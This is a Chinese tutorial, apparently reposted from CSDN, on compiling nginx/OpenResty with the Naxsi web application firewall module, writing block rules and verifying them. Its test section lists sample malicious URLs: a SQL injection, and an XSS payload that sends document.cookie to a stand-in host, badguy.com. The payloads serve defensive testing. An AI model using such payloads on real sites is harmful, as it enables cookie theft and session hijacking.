Nginx使用Naxsi搭建Web应用防火墙(WAF),防xss、防注入

来源:CSDN 发布时间:2019-09-04 10:11:27 作者:admin 阅读量:625

一、说明

    Naxsi是一个开放源代码、高效、低维护规则的Nginx web应用防火墙(Web Application Firewall)模块。Naxsi的主要目标是加固web应用程序,以抵御SQL注入、跨站脚本、跨域伪造请求、本地和远程文件包含漏洞。
官网地址:https://github.com/nbs-system/naxsi

二、下载Naxsi

cd /data0/software/
wget https://github.com/nbs-system/naxsi/archive/master.zip
mv master naxsi-master.zip
unzip naxsi-master.zip

三、重新编译nginx,加入naxsi模块

cd ngx_openresty-1.4.3.6
./configure --user=www --group=www --prefix=/usr/local/openresty --with-luajit --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_realip_module --add-module=/data0/software/naxsi-master/naxsi_src/
gmake
gmake install
cd ../

四、拷贝Naxsi的核心配置规则库

cp /data0/software/naxsi-master/naxsi_config/naxsi_core.rules /usr/local/webserver/nginx/conf/

定义一个虚拟主机的安全规则

vi /usr/local/webserver/nginx/conf/mysite.rules

内容如下:

#LearningMode; #Enables learning mode
SecRulesEnabled;
#SecRulesDisabled;
DeniedUrl "/RequestDenied";
## check rules
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;

编辑nginx.conf

vi /usr/local/webserver/nginx/conf/nginx.conf

在http部分加入如下配置

include       /usr/local/webserver/nginx/conf/naxsi_core.rules;

完整的nginx.conf如下

user  www www;

worker_processes 8;

error_log  /data1/logs/nginx_error.log  crit;

pid        /usr/local/webserver/nginx/nginx.pid;

#Specifies the value for maximum file descriptors that can be opened by this process.
worker_rlimit_nofile 65535;

events
{
  use epoll;
  worker_connections 65535;
}

http
{
  include       mime.types;
  include       /usr/local/webserver/nginx/conf/naxsi_core.rules;
  default_type  application/octet-stream;

  #charset  gb2312;
      
  server_names_hash_bucket_size 128;
  client_header_buffer_size 32k;
  large_client_header_buffers 4 32k;
  client_max_body_size 8m;
      
  sendfile on;
  tcp_nopush     on;

  keepalive_timeout 60;

  tcp_nodelay on;
  server_tokens off;

  fastcgi_connect_timeout 300;
  fastcgi_send_timeout 300;
  fastcgi_read_timeout 300;
  fastcgi_buffer_size 64k;
  fastcgi_buffers 4 64k;
  fastcgi_busy_buffers_size 128k;
  fastcgi_temp_file_write_size 128k;

  gzip on;
  gzip_min_length  1k;
  gzip_buffers     4 16k;
  gzip_http_version 1.0;
  gzip_comp_level 2;
  gzip_types       text/plain application/x-javascript text/css application/xml;
  gzip_vary on;

  #limit_zone  crawler  $binary_remote_addr  10m;
  log_format  access  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
               '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

  log_format  wwwlogs  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
               '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';
              

  server
  {
    listen       80;
    server_name  blog.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/blog;

    #limit_conn   crawler  20;    
                            
    location ~ .*\.(php|php5)?$
    {      
      #fastcgi_pass  unix:/tmp/php-cgi.sock;
      fastcgi_pass  127.0.0.1:9000;
      fastcgi_index index.php;
      include fcgi.conf;
    }
    
    location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
    {
      expires      30d;
    }

    location ~ .*\.(js|css)?$
    {
      expires      1h;
    }    

    access_log  /data1/logs/access.log  access;
  }

  server
  {
    listen       80;
    server_name  www.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/www;

    location / {
        include    /usr/local/webserver/nginx/conf/mysite.rules;
        proxy_pass http://127.0.0.1/;
        proxy_set_header Host www.abc.com;    
    }

    location /RequestDenied {
        return 403;
    }
    access_log  /data1/logs/mysite.log  wwwlogs;
    error_log  /data1/logs/mysite_nginx_error.log debug;
  }

  server
  {
    listen       127.0.0.1:80;
    server_name  www.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/www;

    location ~ .*\.(php|php5)?$
    {      
      #fastcgi_pass  unix:/tmp/php-cgi.sock;
      fastcgi_pass  127.0.0.1:9000;
      fastcgi_index index.php;
      include fcgi.conf;
    }

    access_log  /data1/logs/wwwlogs.log  wwwlogs;
  }

  server
  {
    listen  80;
    server_name  status.blog.abc.com;

    location / {
    stub_status on;
    access_log   off;
    }
  }
}

五、启动nginx

killall -9 nginx
/usr/local/webserver/nginx/sbin/nginx

六、测试

http://www.abc.com/test.php?name=40/**/and/**/1=1  不通过,含有条件注入
http://www.abc.com/test.php?name=%28%29            不通过,特殊字符
http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E                                                   不通过,参数内容含脚本注入
http://www.abc.com/test.php?title=meta%20http-equiv=%22refresh%22%20content=%220;%22 不通过

可以到/data1/logs/mysite_nginx_error.log查看naxsi过滤的请求


Copyright ©2018-2020 [亮师兄] Powered By [个人运维笔记] Version 1.1.0   我要留言
技术支持:亮师兄(服务QQ):44480394网站备案号: 滇ICP备18010560号   备案查询
Catfish(鲶鱼) CMS V 5.4.6